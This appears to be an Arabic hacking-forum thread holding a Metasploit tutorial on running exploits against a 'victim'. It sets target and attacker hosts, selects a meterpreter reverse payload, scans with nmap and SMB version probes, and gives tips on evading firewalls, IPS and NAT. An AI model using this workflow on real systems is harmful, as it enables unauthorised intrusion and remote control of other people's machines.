نحن مع غزة
الـرئـيـسـيـة الـمـنـتـدى سـؤال & اجـابـة الـتـبـرع بـالـدم الاسـتـضـافـة هـلال لـيـنـكـس الـقـرآن الـكـريـم Dz-SeC team


التسجيل في المنتدى غير متاح حاليا, اذا كنت ترغب في الحصول على عضوية ارجو مراسلتي على البريد الالكتروني "[email protected]"


مطلوب مشرفين على كامل اقسام المنتدى


أخي / أختي , إن تسجيل عضوية جديدة في منتدى شبكة الجزائر للجميع لا يهدف إلى زيادة الأعضاء مطلقا
فلا خير في عضوية عدد مشاركاتها صفرا فنحن نرفض يوميا الكثير من العضويات المشكوك في أمرها
سواء كان هدفها الإعلانات الغير شرعية أو تخريب الموضوعات الخ , كل هذا حتى يبقى المنتدى
ساحة جادة عطرة تجود بالخير لكل زوارها وأعضائها
وصدقة جارية لكل من يشارك في كتابة معلومة تفيد غيره سوف يشكر الله عليها وهو في جوف الأرض ...

لذلك نطلب منك التسجيل بل ونلح عليك إن كان هدفك هو أن تصنع صدقة جارية لا تنقطع إلى يوم الدين بمساعدة إخوانك في نشر الخير .

للتسجيل اضغط هنا وأملأ البينات المطلوبة بشكل صحيح ومن ثم انتظر حتى نقوم بتفعيل حسابك وابدأ رحلتك في صناعة صدقة جارية .

وتذكر قول سيد الخلق " إذا مات ابن آدم انقطع عمله إلا من ثلاث صدقة جارية أو علم ينتفع به أو ولدٍ صالح يدعو له "

   

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم 19/04/2010, 17:49   المشاركة رقم: 1
المعلومات
الكاتب:
 ViRuS_Ra3cH  
اللقب:
الصورة الرمزية
 
الصورة الرمزية ViRuS_Ra3cH

البيانات
التسجيل : Mar 2010
العضوية : 2
الاهتمامات : DZ
الإقامة : DZ
المواضيع : 466
الردود : 629
المجموع : 1,095
بمعدل : 0.19 يوميا
الاختراقات : [ra3ch]
مجتمعنا : []
الصنف : Not Hacker
آخر تواجد : 02/01/2018/12:49
سبب الغياب : معكم ألي أخر ضربه أدا كتب ربي..
معدل التقييم: 10
نقاط التقييم: 18
ViRuS_Ra3cH is on a distinguished road
شكراً: 493
تم شكره 194 مرة في 101 مشاركة

 Algeria


الإتصالات
الحالة:
ViRuS_Ra3cH غير متواجد حالياً
وسائل الإتصال:

افتراضي الدرس السادس : استغلال الثغرات والمشاكل التي نواجهها

السلام عليكم ورحمه الله وبركاته

الدرس هذا ما كان بخطة الدوره لكن بعد الاسئله عن كيفيه استغلال الثغره والمشاكل التي تواجها , قررت اكتب هذا الدرس .

على العموم اعتذر على التأخر , لكن الدراسه وما تعمل .



استغلال الثغره اسهل مما تتصور .

بعد ما اخترنا الثغره عن طريق الامر use

بعد ما اخترنا الثغره نكتب show option




بعد ما نظرنا للمتغيرات

راح نجد RHOST

وتعني دائما اي بي الضحيه

ٌRPORT

وتعني دائما بورت الضحيه , غالبا ما انصح بتغييره الا اذا كانت الثغره تعمل على اكثر من بورت

بعدها نضع لكل المتغيرات قيمه .

كود:
set rhost اي بي الضحيه
كود:
set rport بورت الضحيه
بقي الان لنا payload

كود:
set payload payload na me

نكتب

show options



ظهرت لنا خيارات جديده وهي خيارات payload

LHOST وتعني ip المهاجم ,

LPORT وتعني بورت المهاجم

كود:
set lhost اي بي المهاجم
كود:
set lport بورت المهاجم

ثم اخر شيء نكتب exploit

ونشغل الثغره

ما اتوقع ان في اداه استغلالها اسهل من هذا , حتى البايزون التعامل معه اصعب


1- نختار الثغره

كود:
use windows/smb/smb
2- ننظر الى متطلبات الثغره

كود:
show option
3- نضع القيم للمتغيرات

كود:
set المتغير Abc
- نختار payload

كود:
set payload windows/meterpreter
- نضع المتغيرات للـ payload

كود:
set المتغير abc
- نستغل الثغره

كود:
exploit


استغلينا الثغره هل اخترقنا الضحيه ؟!

اذا قال عندك sessions open

عندك ضحيه , اذا ما قالها , يعني ما حصل شيء ,


طيب كيف نستغل الثغره ونعرف انها شغالها , عن طريق الفحص , افحص ضحيتك قبل الهجوم ,

وقبل تفحص ضحيتك , اجمع معلومات عنه .

عندك nmap nessus او amap , لا تهجم قبل تتأكد من ان البورت مفتوح وان النظام معروف

ممكن تخمن النظام عن طريق nmap ويعطيك النظام المتوقع , لكن اذا كان خدمه smb

شغاله , ففي هذه الحاله نقدر نعرف النظام 100 %

عن طريق الميتاسبلويت مثال :
كود:
msf > use auxiliary/scanner/smb/version
msf auxiliary(version) > set rhosts 192.168.1.2
rhosts => 192.168.1.2
msf auxiliary(version) > run[*] 192.168.1.2 is running Windows Vista Ultimate Service Pack 1 (********: Unknown) (****:BANDAR-PC) (domain:WORKGROUP)

msf auxiliary(version) >
اعطاني النظام والاسم والدومين


لكن خلونا نروح للـ nmap

كود:
msf auxiliary(version) > nmap -PN 192.168.1.2 -p 445 -O[*] exec: nmap -PN 192.168.1.2 -p 445 -O


Starting Nmap 5.00 ( http://nmap.org ) at 2010-01-15 05:45 EST
Interesting ports on 192.168.1.2:
PORT    STATE SERVICE
445/tcp open  microsoft-ds
MAC Address: 00:1D:60:64:06:EC (Asustek Computer)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows Vista|2008
OS details: Microsoft Windows Vista SP0 or SP1 or Server 2008 SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.62 seconds
اعطاني مثل ماتشوفون تخمينات ,


عرفنا كيف نختار الثغره اذا كانت ريموت ,

اذا كان الضحيه ما عنده بورت مفتوح ؟!

نروح لتغرات client-side attacks ,

80 % من النوعيه هذي ناجحه , واذا رجعت لهذه الثغرات راح تخترق , مثل تغرات المتصفح


طيب لو ما اشتغلت هذه الثغرات ,,

تأكد من الخيارات من جديد , تأكد انك وضعت جميع القيم للمتغيرات


خارج الايطار : شغل اداه tcpdump لتعرف ان ادواتك شغاله , مثلا لو استغلينا الثغره والميتاسبلويت توقف فجأه او صار اي شيء , راح تكون مراقب الترافيك وتعرف ,

صراحه انا صارت معي مشكله مع nmap فحص جهاز واخذت ساعه وربع وانا انتظر ,

nmap توقف فجأه وانا ما ادري , اخذت انتظر ثم شغلت tcpdump وعرفت ان الـ nmap

متوقف, لذلك من الافضل قبل تسوي اي هجوم شغل tcpdump لتعرف ان ادواتك شغاله على الوجه الصحيح


المهم نرجع لاهم الاسباب في فشل استغلال الثغرات

1- الضحيه لا يستخدم البرنامج المصاب

بعض المرات يكون البرنامج غير موجود وهذه ليست بالمشكله فهنالك العشرات من الثغرات النختلفه .

2- الجدار الناري يحجب الوصول الى البورت

بعض البورتات تكون محجوبه وبعضها لا , مثل تغرات SMB تستخدم اكثر من بورت

لذلك حاول تغير بين البورتات .

3- هنالك من يكشف الثغره ويقوم بحجبها مثل IPS

من الصعب التعامل مع هذه المشكله لكن الافضل هو التعامل مع evasion في الميتاسبلويت

ولا انصح المبتدأ التعامل معها

4- الضحيه ممكن يكون قابل للاستغلال الثغره لكن لم تستغل

هذه المشكله نادرا ما تحدث , وهي عندما تستغل الثغره , ممكن يصير شيء غير متوقع

وهي مثلا يصير له هانق "يهنق" او مثلا يعيد التشغيل

مره كنت اختبر ثغره جديده , الجهاز لي ما كان لأحد بمعنى اخر اختبر الثغره على جهازي

جهازي ما حدثته يعني الثغره لازم تشتغل , استغليت الثغره , وفجأه الجهاز وقف عن العمل لذلك

لذلك ممكن بعض المرات تواجهك هذه المشكله

5- الجهاز خلف nat

هذا اصبح معروف , جميع الاجهزه خلف نات , مافيه اي شخص الا ويستخدم مودم

لذلك يجب التأكد ان البورت مفتوح وايضا تأكد ان تستخدم اتصال عكسي .


SiLv3r00t

v4-team.com



آخر مواضيع » ViRuS_Ra3cH

توقيع : ViRuS_Ra3cH

IS-SEC.ORG is ThE NaMe AnD HaKiNg Is ThE GaMe So FoRgEt ThE Name AnD LeT'S PlaY ThE GaMe
=======
[email protected]
=====
ViRuS_Ra3cH
====

===

عرض البوم صور ViRuS_Ra3cH   رد مع اقتباس
الأعضاء الذين قالوا شكراً لـ ViRuS_Ra3cH على المشاركة المفيدة:
Smail002 (13/01/2011)
قديم 12/07/2010, 07:51   المشاركة رقم: 2
المعلومات
الكاتب:
  WOLF_DZ  
اللقب:
.: نائب المدير :.

الإتصالات
الحالة:
WOLF_DZ غير متواجد حالياً
وسائل الإتصال:

رائع اخي رعش
بارك الله بيك
تحيتي لك

عرض البوم صور WOLF_DZ   رد مع اقتباس
قديم 13/07/2010, 08:43   المشاركة رقم: 3
المعلومات
الكاتب:
  MdMn HaCk3r  
اللقب:
.: المدير السابق للمنتدى :.

الإتصالات
الحالة:
MdMn HaCk3r غير متواجد حالياً
وسائل الإتصال:

ابداع * ابداع
ماشاء الله عليك اخي رعش
الى الامام انشاء الله
تقبل مروري مدمن هكر

عرض البوم صور MdMn HaCk3r   رد مع اقتباس
قديم 07/08/2010, 11:55   المشاركة رقم: 4
المعلومات
الكاتب:
 shapola  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
shapola غير متواجد حالياً
وسائل الإتصال:

****اااااااااااااا يا بطل

عرض البوم صور shapola   رد مع اقتباس
قديم 17/08/2010, 13:33   المشاركة رقم: 5
المعلومات
الكاتب:
 mohamedtebessa  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
mohamedtebessa غير متواجد حالياً
وسائل الإتصال:

**** لك يا مبدع

عرض البوم صور mohamedtebessa   رد مع اقتباس
قديم 13/01/2011, 16:10   المشاركة رقم: 6
المعلومات
الكاتب:
 toxine  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
toxine غير متواجد حالياً
وسائل الإتصال:

thank you bro . موضوع رائع

عرض البوم صور toxine   رد مع اقتباس
قديم 16/05/2011, 13:17   المشاركة رقم: 7
المعلومات
الكاتب:
  jago-dz  
اللقب:
.: مبرمج خبير :.

الإتصالات
الحالة:
jago-dz غير متواجد حالياً
وسائل الإتصال:

****اا لك يا اخ

طبعاا افظل شئ تكتب الاوامر مثل RHOST SRVHOST RPORT LHOST

كابتل لتر كي ماتوقع في بعض الاخطاء أثناء الاستغلال exploit

عرض البوم صور jago-dz   رد مع اقتباس
قديم 06/08/2014, 23:32   المشاركة رقم: 8
المعلومات
الكاتب:
 hicham hack  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
hicham hack غير متواجد حالياً
وسائل الإتصال:

**** يامبدع موضوع جميييييييييييييييييييييييييل

عرض البوم صور hicham hack   رد مع اقتباس
قديم 07/08/2014, 10:57   المشاركة رقم: 9
المعلومات
الكاتب:
 l2le  
اللقب:
عضــــو جديــــد

الإتصالات
الحالة:
l2le غير متواجد حالياً
وسائل الإتصال:

nice share

عرض البوم صور l2le   رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


حالياً الأعضاء النشيطين الذين يشاهدون هذا الموضوع : 1 (0 عضو و 1 ضيف)
 

(أظهر الكل الأعضاء الذين قاموا بمشاهدة هذا الموضوع : 106
3bjo , abdo joker , acer-dz , ahmedm , airami , AKBIROCK3 , alex mex , ali_abdennadher , amr.elbomb , amrhakers , Anis Gladiator , aqm , axa_20062000 , A£K93 , bem981 , benaissa28 , BL_TI , chinwi12 , الشبح المرح , العقرب , اسطوره هكر , D3r K0n!G , dawaima , dh3h1b1 , Dialove , doubleali , Dr.56R , DR.X , dzori , Dz_V!rUs , elmojahid , Ev!LScR!pT_Dz , eXc3lLenCe , fahadjehani , fennec42 , fire-dz , ghost-dz , hacker dz , Hacker_12 , hacoo0 , hak4 , hesham osama , hicham hack , ib4dz , illuminat , indoushka , حكمي , د.مكموخ , jago-dz , john23 , jokerdead , khalil19000 , l2le , lasbat-dz , loock , luop1980 , M0H7 , M3GO , maaahs , Mafia Boy , mahdi king bob , maria1983 , marwane , MdMn HaCk3r , mividalocka , mo3eth , mohamedtebessa , Mr-didi , Mr.3Jr4M , mr_badz , mS_Dz , napster , okita0039 , سلطان , شهير , RaYm0n , rOotdz , S-japonia33 , S1LV3rS3rf3r , SaBeR-Dz , Saif Al-Naar , SAMIRALG , saudi_hack , shadid , shapola , Smail002 , sn.ip , sofyan-c4 , souf91 , souf911 , speedscood , stallin , Th3 WiTch3r-Dz , The UnKn0wN , totti , toxine , ViRuS_Ra3cH , Vladimir , vn-security , VoLc4n0 , WOLF_DZ , Youssef scripter , zakariae123 , ZAZA , zerocold , ZiRbE$t

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

كود [IMG] متاحة
كود HTML متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[الدرس السادس عشر] تثبيـت أقوى مكآفح + فآيرول بنفـس الوقت من شركة Avira ! ViRuS_Ra3cH دورة حماية الاجهزة | Evil-Cod3r 5 09/09/2014 15:06
الدرس السادس - الشتفير بــ الهيكس (الطريقة التقليديه) أحمد العرجان دورة التــــشـــفـــــير 11 21/09/2013 12:11
(الدرس السادس) - اكتشاف ثغرات SQL Injection Vulnerability ViRuS_Ra3cH دورة اكتشاف الثغرات | Dr.BiLLi 4 14/05/2011 20:22
[الدرس السادس] إستخرآج الملفآت الدآخلية + كشـف التلغيم عن طريق PEiD ViRuS_Ra3cH دورة حماية الاجهزة | Evil-Cod3r 2 31/07/2010 07:29
الدرس السادس (استغلال ثغرة Local File Include) ViRuS_Ra3cH دورة تخطي الحماية للسيرفرات | Crazy_Hacker 0 18/03/2010 01:56

الساعة معتمدة بتوقيت جرينتش +1 . الساعة الآن : 22:31.
Copy Right Des 2010 - 2014 To is|sec Organization, Des By  yasMouh 
Powered By vBulletin Special Edition, Secured By Dz-SeC team
Support by Dz-SeC team




RSS RSS 2.0 XML MAP HTML



 
 
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115